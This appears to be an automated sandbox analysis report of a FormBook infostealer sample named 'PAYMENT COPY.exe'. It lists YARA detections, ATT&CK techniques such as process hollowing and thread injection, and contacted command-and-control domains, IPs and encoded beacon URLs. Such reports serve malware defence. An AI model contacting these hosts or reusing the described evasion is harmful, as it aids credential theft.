          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery141Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385291 Sample: PAYMENT COPY.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 31 www.mg-izkerr8.net 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 9 other signatures 2->45 11 PAYMENT COPY.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\ek0j.dll, PE32 11->29 dropped 57 Maps a DLL or memory area into another process 11->57 15 PAYMENT COPY.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 33 cursosdigitaisbr.com 167.114.6.31, 49742, 80 OVHFR Canada 18->33 35 kakavjesajt.com 176.104.107.18, 49730, 80 NINETRS Serbia 18->35 37 13 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 49 Performs DNS queries to domains with low reputation 18->49 22 msdt.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PAYMENT COPY.exe32%VirustotalBrowse
          PAYMENT COPY.exe27%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dll4%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.1.PAYMENT COPY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.msdt.exe.51e7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.PAYMENT COPY.exe.2650000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.msdt.exe.e45378.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.2.PAYMENT COPY.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.beyoncos.com0%VirustotalBrowse
          kakavjesajt.com0%VirustotalBrowse
          www.sportfest40.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.beyoncos.com/eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.35efb510815e.com/eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sportfest40.com/eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://181ue.com/sq.html?entry=0%Avira URL Cloudsafe
          www.cursosdigitaisbr.com/eqas/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8100%Avira URL Cloudmalware
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          https://www.8dq98.com/enter/index.html0%Avira URL Cloudsafe
          http://www.llmav.xyz/eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.beyoncos.com
          		14.129.120.32
          		truetrueunknown
          kakavjesajt.com
          		176.104.107.18
          		truetrueunknown
          www.sportfest40.com
          		104.21.28.135
          		truetrueunknown
          www.mg-izkerr8.net
          		52.79.124.173
          		truetrue
            		unknown
            www.llmav.xyz
            		35.244.230.236
            		truefalse
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                cursosdigitaisbr.com
                		167.114.6.31
                		truetrue
                  		unknown
                  34.anxin58.com
                  		23.225.41.92
                  		truetrue
                    		unknown
                    www.35efb510815e.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.360caiyin.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.kakavjesajt.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.nescleanups.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.cursosdigitaisbr.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.stripepayment.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.cjaccessories.net
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.cjaccessories.net/eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.beyoncos.com/eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.35efb510815e.com/eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sportfest40.com/eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  www.cursosdigitaisbr.com/eqas/true
                                  • Avira URL Cloud: malware
                                  		low
                                  http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.llmav.xyz/eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                          		high
                                          https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                              		high
                                              https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.tiro.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.goodfont.co.krexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.carterandcone.comlexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.typography.netDexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://fontfabrik.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://181ue.com/sq.html?entry=msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        https://hm.baidu.com/hm.js?msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            		high
                                                            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.fonts.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.8dq98.com/enter/index.htmlmsdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                176.104.107.18
                                                                		kakavjesajt.comSerbia
                                                                		198371NINETRStrue
                                                                167.114.6.31
                                                                		cursosdigitaisbr.comCanada
                                                                		16276OVHFRtrue
                                                                35.244.230.236
                                                                		www.llmav.xyzUnited States
                                                                		15169GOOGLEUSfalse
                                                                23.227.38.74
                                                                		shops.myshopify.comCanada
                                                                		13335CLOUDFLARENETUStrue
                                                                14.129.120.32
                                                                		www.beyoncos.comKorea Republic of
                                                                		9286KINXIDC-AS-KRKINXKRtrue
                                                                104.21.28.135
                                                                		www.sportfest40.comUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                23.225.41.92
                                                                		34.anxin58.comUnited States
                                                                		40065CNSERVERSUStrue
                                                                52.79.124.173
                                                                		www.mg-izkerr8.netUnited States
                                                                		16509AMAZON-02UStrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:385291
                                                                Start date:12.04.2021
                                                                Start time:09:43:56
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 9m 57s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:PAYMENT COPY.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:24
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@7/3@12/8
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 22.5% (good quality ratio 20.3%)
                                                                • Quality average: 74%
                                                                • Quality standard deviation: 31.4%
                                                                HCA Information:
                                                                • Successful, ratio: 92%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 92.122.145.220, 2.23.155.186, 2.23.155.232, 52.147.198.201, 104.43.193.48, 52.255.188.83, 20.50.102.62, 92.122.213.247, 92.122.213.194, 104.43.139.144, 52.155.217.156, 20.54.26.129, 184.30.24.56, 168.61.161.212, 20.82.210.154
                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, download.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com.edgesuite.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                23.227.38.74Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • www.worldsabroad.com/hx3a/?qJE0=ByCcBdCDA9ynDZ0p2mvosMnRVFdtAJOL45GnySkY7pv3UdFI4qVYyr3+Nz+s3xG49ZTQ7g==&MFNTHp=zXaxujox
                                                                winlog.exeGet hashmaliciousBrowse
                                                                • www.tagualove.com/uwec/?uzu8=4lE6ePOjgVOxQbKwmPb1ExKNrZ9hSDAusM8u/5C1B85TxEFkqvNdXJuLoKP4GsHywYGm&NjQhkT=8p44gXmp
                                                                36ne6xnkop.exeGet hashmaliciousBrowse
                                                                • www.essentiallyourscandles.com/p2io/?1bVpY=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&TVg8Ar=tFNd1Vlhj2qp
                                                                Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                                                • www.rideequihome.com/iu4d/?jBZ4=dYMXTz3oQAQLkNaLcUxsUovqIEfQQMeG6VLojiGd9Hw1vsxtxl1xN3dYL0Oy7pqqR6f8&1bz=WXrpCdsXv
                                                                giATspz5dw.exeGet hashmaliciousBrowse
                                                                • www.squeakyslimes.com/a6ru/?OtZhTl=wZOPRxK8tpyPd&KzuD=lfMB28QesiJBcE5BXZRwN/zOtPplnlykGnT8TD32dw805CVoyQ8xbgtvqYaGqJpCt+n4lE3Dhg==
                                                                IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                • www.recovatek.com/hx3a/?df=fCmUcBRkMsU23gyon11B/xiypSW2fUD8cUjfy08rELK4cGFPgnyxy77uL+u9ezJOoCatMA==&rJ=w0G8E6
                                                                HG546092227865431209.exeGet hashmaliciousBrowse
                                                                • www.dollfaceextensionsllc.net/ct6a/?j2JHaJc=92RjyhAwLwjL7yI7dz7K3gLd4uBg10QtxWOWXnGeU67JXFS1m9O45cTA70CqXfonfR76&KthHT=LXaP
                                                                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                • www.trendyheld.com/edbs/?BbW=d74BDEXnxoADciMbQzj0eCjrMELcvf+wOrQFljwVZdGJg+vXDTJsALwkgrXDTrto9sU7&blX=yVCTVP0X
                                                                pumYguna1i.exeGet hashmaliciousBrowse
                                                                • www.essentiallyourscandles.com/p2io/?uFNl=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&-ZSXw=ctxh_fYh
                                                                0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                • www.busybeecreates.com/bei3/?8p=EZa0cv&2d=OGWfJfpUnHsdThEHHqOdnDkqqSd1vNA2rxr/ypdVXp7lfSasz7bxTgAFATjYM0d9Yd+JVdPS6Q==
                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                • www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu
                                                                AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                • www.gracieleesgiftsandmore.com/hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD
                                                                payment.exeGet hashmaliciousBrowse
                                                                • www.moxa-pro.com/bei3/?Rl=M48tiJch&M4YDYvh=y7EZsd/VU66W5EPJYwX5Xfv+3DSZx1f1d6WAR6GRDy2o8Omo0ZsYhDvN6jXI6rbTZYPD
                                                                Order.exeGet hashmaliciousBrowse
                                                                • www.woofytees.com/cugi/?BlL=guBtZ9/BZLKg3V3RSdvXg/8z1FJ37mZkFho76YC6dYQSBoV8kgYAqcCQ9vWS/DgnoPIa&EZXpx6=tXExBh8PdJwpH
                                                                PO91361.exeGet hashmaliciousBrowse
